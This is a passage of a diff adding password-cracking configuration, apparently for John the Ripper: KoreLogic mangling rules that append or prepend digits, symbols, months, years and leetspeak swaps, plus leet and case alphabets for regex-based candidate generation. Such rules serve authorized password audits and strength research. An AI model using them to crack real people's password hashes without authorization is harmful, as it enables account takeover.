+-[c:] a2 \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:AppendJustNumbers]
+-[c:] <* \p[c:] $[0-9]
+-[c:] <- \p[c:] Az"[0-9][0-9]"
+-[c:] a3 \p[c:] Az"[0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:AppendNumbers_and_Specials_Simple]
+# cap first letter then add a 0  2 6 9 ! *  to the end
+-[c:] a1 \p[c:] $[0-9]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+# cap first letter then add a special char - THEN a number  !0 %9 !9 etc
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+# Cap the first letter - then add 0? 0! 5_ .. 9!
+## add NUMBER then SPECIAL    1! .. 9?
+-[c:] a2 \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+## Add Number Number Special
+-[c:] a3 \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+## Add Special Number Number
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+# Add 100! ... 999! to the end
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendJustSpecials]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:MonthsFullPreface]
+-[:c] a7 A0"\p[jJ]anuary"
+-[:c] a8 A0"\p[fF]ebruary"
+-[:c] a5 A0"\p[mM]arch"
+-[:c] a5 A0"\p[aA]pril"
+-[:c] a3 A0"\p[mM]ay"
+-[:c] a4 A0"\p[jJ]une"
+-[:c] a4 A0"\p[jJ]uly"
+-[:c] a6 A0"\p[aA]ugust"
+-[:c] a9 A0"\p[sS]eptember"
+-[:c] a7 A0"\p[oO]ctober"
+-[:c] a8 A0"\p[nN]ovember"
+-[:c] a8 A0"\p[dD]ecember"
+
+[List.Rules:AddShortMonthsEverywhere]
+a3 >\r[00123456789] A\p[z0-9]"[jJ][aA][nN]"
+a3 >\r[00123456789] A\p[z0-9]"[fF][eE][bB]"
+a3 >\r[00123456789] A\p[z0-9]"[mM][aA][rRyY]"
+a3 >\r[00123456789] A\p[z0-9]"[aA][pP][rR]"
+a3 >\r[00123456789] A\p[z0-9]"[jJ][uU][nNlL]"
+a3 >\r[00123456789] A\p[z0-9]"[aA][uU][gG]"
+a3 >\r[00123456789] A\p[z0-9]"[sS][eE][pP]"
+a3 >\r[00123456789] A\p[z0-9]"[oO][cC][tT]"
+a3 >\r[00123456789] A\p[z0-9]"[nN][oO][vV]"
+a3 >\r[00123456789] A\p[z0-9]"[dD][eE][cC]"
+
+[List.Rules:Prepend4LetterMonths]
+## Preface each dictionary with Janu janu Febr febr
+-[:c] a4 A0"\p[jJ]anu"
+-[:c] a4 A0"\p[fF]ebr"
+-[:c] a4 A0"\p[mM]arc"
+-[:c] a3 A0"\p[aA]pr"
+-[:c] a3 A0"\p[mM]ay"
+-[:c] a4 A0"\p[jJ]une"
+-[:c] a4 A0"\p[jJ]uly"
+-[:c] a4 A0"\p[Aa]ugu"
+-[:c] a4 A0"\p[sS]ept"
+-[:c] a4 A0"\p[oO]cto"
+-[:c] a4 A0"\p[nN]ove"
+-[:c] a4 A0"\p[Dd]ece"
+
+# this will add the string '2010' at all places in the word:
+# USE this with a 4 or 5 char dictionary file with ALL characters
+# soo abcde will become
+# 2010abcde  a2010bcde  ab2010cde  acd2010de  abcd2010e  abcde2010
+[List.Rules:Add2010Everywhere]
+a4 >\r[00123456789] A\p[z0-9]"201[0-9]"
+
+[List.Rules:PrependDaysWeek]
+a6 A0"[Mm][oO0][nN][dD][aA4@][yY]"
+a7 A0"[Tt][uU][eE3][sS$][dD][aA4@][yY]"
+a9 A0"[Ww][eE3][dD][nN][eE3][sS$][dD][aA4@][yY]"
+a8 A0"[Tt][hH][uU][rR][sS$][dD][aA4@][yY]"
+a6 A0"[Ff][rR][iI1!][dD][aA4@][yY]"
+a8 A0"[Ss][aA4@][tT+][uU][rR][dD][aA4@][yY]"
+a6 A0"[Ss][uU][nN][dD][aA4@][yY]"
+
+[List.Rules:Add1234_Everywhere]
+a4 >\r[00123456789] A\p[z0-9]"1234"
+
+[List.Rules:AppendMonthDay]
+-[:c] <* Az"\p[jJ]anuary"
+-[:c] a8 Az"\p[jJ]anuary[0-9]"
+-[:c] a9 Az"\p[jJ]anuary[0-9][0-9]"
+-[:c] <* Az"\p[fF]ebruary"
+-[:c] a9 Az"\p[fF]ebruary[0-9]"
+-[:c] aA Az"\p[fF]ebruary[0-9][0-9]"
+-[:c] <* Az"\p[mM]arch"
+-[:c] a6 Az"\p[mM]arch[0-9]"
+-[:c] a7 Az"\p[mM]arch[0-9][0-9]"
+-[:c] <* Az"\p[aA]pril"
+-[:c] a6 Az"\p[aA]pril[0-9]"
+-[:c] a7 Az"\p[aA]pril[0-9][0-9]"
+-[:c] <* Az"\p[mM]ay"
+-[:c] a4 Az"\p[mM]ay[0-9]"
+-[:c] a5 Az"\p[mM]ay[0-9][0-9]"
+-[:c] <* Az"\p[jJ]une"
+-[:c] a5 Az"\p[jJ]une[0-9]"
+# There was a typo in Kore's original revision of this rule
+-[:c] a6 Az"\p[jJ]une[0-9][0-9]"
+-[:c] <* Az"\p[jJ]uly"
+-[:c] a5 Az"\p[jJ]uly[0-9]"
+-[:c] a6 Az"\p[jJ]uly[0-9][0-9]"
+-[:c] <* Az"\p[aA]ugust"
+-[:c] Az"\p[aA]ugust[0-9]"
+-[:c] Az"\p[aA]ugust[0-9][0-9]"
+-[:c] <* Az"\p[sS]eptember"
+-[:c] aA Az"\p[sS]eptember[0-9]"
+# There was a typo in Kore's original revision of this rule
+-[:c] aB Az"\p[sS]eptember[0-9][0-9]"
+-[:c] <* Az"\p[oO]ctober"
+-[:c] a8 Az"\p[oO]ctober[0-9]"
+-[:c] a9 Az"\p[oO]ctober[0-9][0-9]"
+-[:c] <* Az"\p[nN]ovember"
+-[:c] a9 Az"\p[nN]ovember[0-9]"
+-[:c] aA Az"\p[nN]ovember[0-9][0-9]"
+-[:c] <* Az"\p[dD]ecember"
+-[:c] a9 Az"\p[dD]ecember[0-9]"
+-[:c] aA Az"\p[dD]ecember[0-9][0-9]"
+
+[List.Rules:AppendMonthCurrentYear]
+-[:c] a7 Az"\p[jJ]an201[0-9]"
+-[:c] a7 Az"\p[fF]eb201[0-9]"
+-[:c] a7 Az"\p[mM]ar201[0-9]"
+-[:c] a7 Az"\p[aA]pr201[0-9]"
+-[:c] a7 Az"\p[mM]ay201[0-9]"
+-[:c] a7 Az"\p[jJ]un201[0-9]"
+-[:c] a7 Az"\p[jJ]ul201[0-9]"
+-[:c] a7 Az"\p[Aa]ug201[0-9]"
+-[:c] a7 Az"\p[sS]ep201[0-9]"
+-[:c] a7 Az"\p[oO]ct201[0-9]"
+-[:c] a7 Az"\p[nN]ov201[0-9]"
+-[:c] a7 Az"\p[Dd]ec201[0-9]"
+
+[List.Rules:ReplaceNumbers2Special]
+a0 /[1-90] s\0\p[!@#$%^&*()]
+a0 /1 /[2-90] s1! s\0\p[@#$%^&*()]
+a0 /2 /[3-90] s2@ s\0\p[#$%^&*()]
+a0 /3 /[4-90] s3# s\0\p[$%^&*()]
+a0 /4 /[5-90] s4$ s\0\p[%^&*()]
+a0 /5 /[6-90] s5% s\0\p[^&*()]
+a0 /6 /[7-90] s6^ s\0\p[&*()]
+a0 /7 /[890] s7& s\0\p[*()]
+a0 /8 /[90] s8* s\0\p[()]
+a0 /9 /0 s9( s0)
+
+[List.Rules:ReplaceNumbers]
+a0 /0 s0[1-9]
+a0 /1 s1[02-9]
+a0 /2 s2[013-9]
+a0 /3 s3[0-24-9]
+a0 /4 s4[0-35-9]
+a0 /5 s5[0-46-9]
+a0 /6 s6[0-57-9]
+a0 /7 s7[0-68-9]
+a0 /8 s8[0-79]
+a0 /9 s9[0-8]
+# 10 lines above can be replaced with just one:
+# /[0-9] s\0[0-9] Q
+# but it's slower (generates, then rejects some duplicates).
+
+# This is a lamer/faster version of --rules:nt
+[List.Rules:ReplaceLettersCaps]
+-c a0 /[a-z] s\0\p[A-Z]
+
+[List.Rules:AddDotCom]
+-[c:] a4 \p[c:] Az".com"
+-[c:] a4 \p[c:] Az".net"
+-[c:] a4 \p[c:] Az".org"
+
+[List.Rules:AppendCap-Num_or_Special-Twice]
+-[c:] a3 \p[c:] Az"[A-Z][0-9][0-9]"
+-[c:] a3 \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+-[c:] a3 \p[c:] Azq[A-Z][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+-[c:] a3 \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendSpecialLowerLower]
+-[c:] a3 \p[c:] AzQ[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][a-z][a-z]Q
+
+[List.Rules:AppendJustSpecials3Times]
+-[c:] a3 \p[c:] Az"[!$@#%.][!$@#%.][!$@#%.]"
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:PrependJustSpecials]
+-[c:] a1 \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append1_AddSpecialEverywhere]
+-[c:] >4 a2 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
+-[c:] >[5-8] a2 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
+
+[List.Rules:PrependNumNum_AppendNumSpecial]
+-[c:] a4 \p[c:] A0"[0-9][0-9]" Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendNum_AddSpecialEverywhere]
+# This should probably use $[02-9] since we try $1 in
+# Append1_AddSpecialEverywhere
+-[c:] >4 a2 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[02-9]
+-[c:] >[5-8] a2 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[02-9]
+
+[List.Rules:AppendNumNum_AddSpecialEverywhere]
+-[c:] >4 a3 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]"
+-[c:] >[5-8] a3 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]"
+
+[List.Rules:AppendNumNumNum_AddSpecialEverywhere]
+-[c:] >4 a4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]"
+-[c:] >[5-8] a4 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]"
+
+[List.Rules:AppendYears_AddSpecialEverywhere]
+-[c:] >4 a5 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]"
+-[c:] >4 a5 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]"
+-[c:] >[5-8] a5 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]"
+-[c:] >[5-8] a5 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]"
+
+# This rule needs work actually --- you have to 'sort -u' its output    rick
+# /a = reject if it doesnt have an 'a'
+# the [:c] does waste some effort - and generate dupes. This is wasteful,
+# but I want to keep it in b/c the original crack/JtR rules use it.
+[List.Rules:L33t]
+-[:c] a0 /\r[aaAAbBeEiiiIIIllll] s\0\r\p[@44@88331!|1!|17|!] \p1[:M] \p1[:c] \p1[:Q]
+# The following line differs from Kore's erroneous 4 lines:
+-[:c] a0 /\r[LLLL] s\0\r\p[17|!] \p1[:M] \p1[:c] \p1[:Q]
+#/Lsl1[:c]
+#/Lsl7[:c]
+#/Lsl|[:c]
+#/Lsl![:c]
+-[:c] a0 /\r[oOssSStT1111003344557788] s\0\r\p[00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Full set (same as above, but on one line):
+#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Double substitutions start here.
+# Compared to Kore's, we check for both chars first, then replace both.
+# This produces different results from Kore's, which would replace all
+# instances of the first char before checking for the second.
+# Kore's behavior may be restored by moving "sa[@4]" to be right after "/a"
+# on the line below, and ditto for further lines.
+-[:c] a0 /a /\r[AAbBeEiiiIIIllllLLLLoOssSStT111100334@557788] sa[@4] s\2\r\p2[4@88331!|1!|17|!17|!00$5$5++!iI|oOeE@4sSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore had these (probably unintentionally, so we don't duplicate them):
+#/asa4/4s4a[:c]
+#/asa4/4s4A[:c]
+-[:c] a0 /A /\r[aabBeEiiiIIIllllLLLLoOssSStT1111003344557788] sA4 s\0\r\p[@488331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore also had these, but (intentionally?) missed sb8 on this set (after sA4)
+#/AsA4/4s4a[:c]
+#/AsA4/4s4A[:c]
+-[:c] a0 /b /\r[aaAABeEiiiIIIllllLLLLoOssSStT1111003344557788] sb8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /B /\r[aaAAbeEiiiIIIllllLLLLoOssSStT1111003344557788] sB8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /e /\r[aaAAbBEiiiIIIllllLLLLoOssSStT1111003344557788] se3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /E /\r[aaAAbBeiiiIIIllllLLLLoOssSStT1111003344557788] sE3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /i /\r[aaAAbBeEIIIllllLLLLoOssSStT1111003344557788] si[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /I /\r[aaAAbBeEiiillllLLLLoOssSStT1111003344557788] sI[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore's rules only included sl[17|], but not sl!
+-[:c] a0 /l /\r[aaAAbBeEiiiIIILLLLoOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# All "/L" rules (171 lines) were buggy
+-[:c] a0 /L /\r[aaAAbBeEiiiIIIlllloOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /o /\r[aaAAbBeEiiiIIIllllLLLLOssSStT1111003344557788] so0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /O /\r[aaAAbBeEiiiIIIllllLLLLossSStT1111003344557788] sO0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /s /\r[aaAAbBeEiiiIIIllllLLLLoOSStT1111003344557788] ss[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /S /\r[aaAAbBeEiiiIIIllllLLLLoOsstT1111003344557788] sS[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /t /\r[aaAAbBeEiiiIIIllllLLLLoOssSST1111003344557788] st+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /T /\r[aaAAbBeEiiiIIIllllLLLLoOssSSt1111003344557788] sT+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# are these 100% redundant from above rules? !!!!
+-[:c] a0 /1 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT003344557788] s1[!iI|] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /0 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11113344557788] s0[oO] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|eEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /3 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110044557788] s3[eE] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /4 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033557788] s4[aA] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /5 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033447788] s5[sS] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /7 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445588] s7[lL] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /8 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445577] s8[bB] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlL] \p1[:M] \p1[:c] \p1[:Q]
+# These are some popular triple/quad l33t rules
+-[:c] a0 /a /e /[los] sa4 se3 s\0\p[10$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /[ae] /l /[os] s\2\p2[43] sl1 s\3\p3[0$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /[ae] /o /s s\2\p2[43] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /l /o /s sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /[el] /o /s sa4 s\0\p[31] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /e /l /o /s se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /a /e /l /o /s sa4 se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
+
+[List.Rules:ReplaceSpecial2Special]
+# Kore's rules were missing "*"
+# Kore's rules were missing ?[]{}`~
+# Now converted into just a SINGLE rule (well 2 since ? must use class syntax)
+#    The rules do add a Q to avoid no-op, but it is now 2 'working' rules
+#    NOTE, there were numerous rules which also had problems, which were fixed
+#    (in commented out rules), and are 'right' in the 2 new replacement rules.
+# Now thru some pre-processor jiu jitsu, this was reduced to a single rule line
+a0 /[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~?]\p\r[:::::::::::::::::::::::::::::::?] \p\r[:::::::::::::::::::::::::::::::s]\p\r[sssssssssssssssssssssssssssssss?]\1[!@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~] Q
+#these 2 are replaced by the equivalent above 1 rule.
+# /[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~] s\0[!@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~] Q
+# /?? s??[!@#$%^&*()\-=_+\\|;:'",./><\[\]{}`~]
+#these are replaced by the equivalent above 2 rule lines.
+# /! s![@#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~]
+# /@ s@[!#$%^&*()\-=_+\\|;:'",./?><\[\]{}`~]
+#others replacing #$%^&*()-=_+\|;:'",./?><[]{}`~ cut out, and not shown.
+
+[List.Rules:ReplaceLetters]
+a0 /[a-z] s\0[a-z] Q
+-c a0 /[a-z] s\0[A-Z]
+
+####################################################################
+# This ruleset contains ALL of the above, for a total
+# of 7,074,074 rules after dupe removal
+[List.Rules:KoreLogic]
+.include [List.Rules:PrependNumNum]
+.include [List.Rules:PrependYears]
+.include [List.Rules:AppendYears]
+.include [List.Rules:PrependNumNumNum]
+.include [List.Rules:MonthsFullPreface]
+.include [List.Rules:Prepend4LetterMonths]
+.include [List.Rules:PrependSeason]
+.include [List.Rules:AppendSeason]
+.include [List.Rules:PrependHello]
+.include [List.Rules:AppendCurrentYearSpecial]
+.include [List.Rules:PrependSpecialSpecial]
+.include [List.Rules:Append2Letters]
+.include [List.Rules:AddJustNumbers]
+.include [List.Rules:DevProdTestUAT]
+.include [List.Rules:PrependAndAppendSpecial]
+.include [List.Rules:AppendJustNumbers]
+# This is split for better order:
+# First part of AppendNumbers_and_Specials_Simple
+-[c:] a1 \p[c:] $[0-9]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+-[c:] a2 \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+.include [List.Rules:AppendJustSpecials]
+.include [List.Rules:AddShortMonthsEverywhere]
+.include [List.Rules:Add2010Everywhere]
+.include [List.Rules:Add1234_Everywhere]
+.include [List.Rules:AppendMonthDay]
+.include [List.Rules:AppendMonthCurrentYear]
+.include [List.Rules:ReplaceNumbers2Special]
+.include [List.Rules:ReplaceNumbers]
+.include [List.Rules:ReplaceLettersCaps]
+.include [List.Rules:AddDotCom]
+.include [List.Rules:PrependJustSpecials]
+.include [List.Rules:Append1_AddSpecialEverywhere]
+.include [List.Rules:AppendNum_AddSpecialEverywhere]
+.include [List.Rules:AppendNumNum_AddSpecialEverywhere]
+.include [List.Rules:AppendNumNumNum_AddSpecialEverywhere]
+.include [List.Rules:AppendYears_AddSpecialEverywhere]
+.include [List.Rules:L33t]
+.include [List.Rules:ReplaceSpecial2Special]
+.include [List.Rules:ReplaceLetters]
+.include [List.Rules:AppendSpecialNumberNumber]
+.include [List.Rules:PrependNumNumAppendSpecial]
+.include [List.Rules:PrependNumNumSpecial]
+.include [List.Rules:Append2NumSpecial]
+.include [List.Rules:PrependDaysWeek]
+# Second part of AppendNumbers_and_Specials_Simple
+-[c:] a3 \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+.include [List.Rules:PrependSpecialSpecialAppendNumber]
+.include [List.Rules:Append4Num]
+.include [List.Rules:PrependNumNumNumNum]
+.include [List.Rules:Prepend2NumbersAppend2Numbers]
+.include [List.Rules:PrependCAPCAPAppendSpecial]
+.include [List.Rules:AppendSpecialLowerLower]
+# Last part of AppendNumbers_and_Specials_Simple
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+.include [List.Rules:AppendSpecial3num]
+.include [List.Rules:AppendSpecialNumberNumberNumber]
+.include [List.Rules:Append3NumSpecial]
+.include [List.Rules:PrependNumNum_AppendNumSpecial]
+.include [List.Rules:AppendJustSpecials3Times]
+.include [List.Rules:AppendCap-Num_or_Special-Twice]
+.include [List.Rules:PrependSpecialSpecialAppendNumbersNumber]
+.include [List.Rules:Append5Num]
+.include [List.Rules:AppendSpecial4num]
+.include [List.Rules:Prepend4NumAppendSpecial]
+.include [List.Rules:Append4NumSpecial]
+.include [List.Rules:PrependSpecialSpecialAppendNumbersNumberNumber]
+.include [List.Rules:Append6Num]
@@ -0,0 +1,375 @@
+# regex_alphabets.conf
+#
+#  This is the multiple alphabest usable by rexgen function.
+
+# this is the 'default'
+[List.Rexgen.Alpha]
+
+# can also use -i mode rexgen (TBD)
+[List.Rexgen.Alpha:cased]
+a=[aA]
+b=[bB]
+c=[cC]
+d=[dD]
+e=[eE]
+f=[fF]
+g=[gG]
+h=[hH]
+i=[iI]
+j=[jJ]
+k=[kK]
+l=[lL]
+m=[mM]
+n=[nN]
+o=[oO]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS]
+t=[tT]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA]
+B=[bB]
+C=[cC]
+D=[dD]
+E=[eE]
+F=[fF]
+G=[gG]
+H=[hH]
+I=[iI]
+J=[jJ]
+K=[kK]
+L=[lL]
+M=[mM]
+N=[nN]
+O=[oO]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS]
+T=[tT]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# simple 1337 mode.  ONLY leet's lower case letters, and smallish alphabet. But VERY fast.
+[List.Rexgen.Alpha:leet]
+a=[a4@]
+b=[b8]
+e=[e3]
+g=[g9]
+i=[i!]
+l=[l17]
+o=[o0]
+s=[s$5]
+t=[t+7]
+
+# simple 1337 mode with mixed case
+[List.Rexgen.Alpha:leet+c]
+a=[aA4@]
+b=[bB8]
+c=[cC]
+d=[dD]
+e=[eE3]
+f=[fF]
+g=[gG9]
+h=[hH]
+i=[iI!]
+j=[jJ]
+k=[kK]
+l=[lL1]
+m=[mM]
+n=[nN]
+o=[oO0]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS$5]
+t=[tT+7]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA]
+B=[bB]
+C=[cC]
+D=[dD]
+E=[eE]
+F=[fF]
+G=[gG]
+H=[hH]
+I=[iI]
+J=[jJ]
+K=[kK]
+L=[lL]
+M=[mM]
+N=[nN]
+O=[oO]
+P=[pP]
+Q=[qQ]
+R=[rR]
+S=[sS]
+T=[tT]
+U=[uU]
+V=[vV]
+W=[wW]
+X=[xX]
+Y=[yY]
+Z=[zZ]
+
+# much stronger 1337 mode.  Does much larger alphabet.  Includes a couple multiple
+# character replacement values: f -> ph and f -> |=  Also does upper case
+# note contains ALL values from Rexgen.Alpha:leet
+[List.Rexgen.Alpha:leet2]
+a=[a4@]
+b=[b8]
+c=[c\(<k]
+e=[e3]
+f=(f|ph|\|=)
+g=[g9]
+i=[i1!\|]
+l=[l1]
+o=[o0]
+s=[s$5]
+t=[t+7]
+A=[A4@]
+B=[B8]
+C=[C\(<k]
+E=[E3]
+F=(F|Ph|PH|\|=)
+G=[G9]
+I=[I1!\|]
+L=[L1]
+O=[O0]
+S=[S$5]
+T=[T+7]
+
+# stronger elete, with mixed case.
+[List.Rexgen.Alpha:leet2_case]
+a=[aA4@]
+b=[bB8]
+c=[cC\(]
+d=[dD]
+e=[eE3]
+f=(f|F|ph|Ph|PH|\|=)
+g=[gG9]
+h=[hH]
+i=[iI1!\|]
+j=[jJ]
+k=[kK]
+l=[lL1]
+m=[mM]
+n=[nN]
+o=[oO0]
+p=[pP]
+q=[qQ]
+r=[rR]
+s=[sS$5]
+t=[tT+7]
+u=[uU]
+v=[vV]
+w=[wW]
+x=[xX]
+y=[yY]
+z=[zZ]
+A=[aA4@]
+B=[bB8]
+C=[cC\(]
+D=[dD]
+E=[eE3]
+F=(f|F|Ph|ph|PH|\|=)
